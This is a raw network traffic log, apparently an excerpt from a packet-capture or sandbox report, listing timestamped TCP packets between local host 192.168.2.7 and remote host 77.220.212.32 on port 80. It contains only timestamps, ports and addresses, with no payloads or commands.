Nov 9, 2024 02:47:11.572217941 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572235107 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572247982 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572264910 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572268963 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572274923 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572285891 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572297096 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572297096 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572324038 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572341919 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572473049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572485924 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572495937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572513103 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572541952 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572547913 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572552919 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572565079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572577953 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572581053 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572588921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572607040 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572634935 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572772026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572782040 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572799921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572810888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572822094 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572829008 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572833061 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572834969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572841883 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572844982 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572863102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572866917 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572875023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572885990 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572896004 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572900057 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572907925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572920084 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572921038 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572937965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572942019 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572948933 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572952032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572959900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572973013 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572974920 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.572983980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.572999954 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573009968 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573018074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573030949 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573040962 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573045969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573050976 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573054075 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573065042 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573081970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573092937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573096991 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573106050 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573110104 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573123932 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573136091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573143005 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573144913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573158026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573169947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573177099 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573182106 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573184013 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573189020 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573194981 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573208094 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573218107 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573219061 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573230982 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573240042 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573245049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573255062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573266029 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573280096 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573282957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573297977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573303938 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573309898 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573322058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573326111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573332071 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573333025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573367119 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573556900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573569059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573580980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573591948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573602915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573605061 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573630095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573643923 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573664904 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573678017 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573688030 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573699951 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573708057 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573712111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573721886 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573724985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573736906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573746920 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573755026 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573774099 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573785067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573797941 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573822021 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573882103 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573901892 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573923111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573935032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.573954105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573966980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.573993921 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574007988 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574018002 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574019909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574033022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574043036 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574048996 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574053049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574064970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574070930 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574083090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574093103 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574096918 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574109077 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574139118 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574146032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574157000 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574162960 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574167967 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574182034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574188948 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574193954 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574206114 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574213982 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574218035 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574244022 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574255943 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574796915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574809074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574820042 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574831963 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574842930 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574850082 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574861050 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574863911 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574872971 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574884892 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574892044 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574898005 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574908018 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574914932 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574918985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574928999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574935913 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574940920 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574951887 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574951887 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574965954 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574970961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.574976921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.574989080 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.575001001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.575005054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.575030088 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.575036049 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.690802097 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.690874100 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.690934896 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.690947056 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.690958977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.690970898 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.690977097 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.690989017 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691000938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691009998 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691009998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691025019 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691044092 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691050053 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691061974 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691068888 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691073895 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691085100 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691093922 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691095114 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691111088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691112995 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691123009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691132069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691144943 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691150904 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691160917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691171885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691173077 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691183090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691198111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691231966 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691251993 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691261053 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691277981 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691287041 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691289902 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691301107 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691318035 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691320896 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691330910 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691365957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691498041 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691509008 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691526890 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691538095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691540956 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691553116 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691560984 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691575050 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691581011 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691593885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691603899 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691606998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691620111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691631079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691632032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691642046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691654921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691663027 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691664934 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691678047 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691685915 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691704988 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691708088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691720963 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691725969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691742897 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691747904 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691768885 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691776037 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691925049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.691965103 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.691991091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692030907 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692100048 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692110062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692121029 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692126036 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692140102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692148924 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692151070 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692162991 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692167997 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692173958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692192078 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692197084 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692209005 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692215919 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692223072 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692234039 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692234039 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692245007 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692255974 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692261934 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692274094 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692286015 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692291975 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692312956 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692326069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692338943 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692363024 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692399979 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692411900 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692423105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692440033 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692441940 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692452908 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692462921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692471027 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692473888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692495108 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692514896 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692523956 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692536116 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692547083 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692564964 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692579031 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692683935 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692694902 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692711115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692723036 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692723036 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692737103 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692749023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692749023 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692760944 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692764044 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692771912 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692781925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692790031 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692799091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692811012 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692814112 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692821980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692822933 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692841053 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692852020 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692852020 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692873955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692888021 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692895889 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692898989 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692912102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692922115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692929983 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692933083 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692940950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692944050 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692964077 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692970037 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.692975998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692991972 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.692995071 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693002939 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693013906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693022013 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693025112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693036079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693047047 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693047047 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693059921 CET	80	49699	77.220.212.32	192.168.2.7
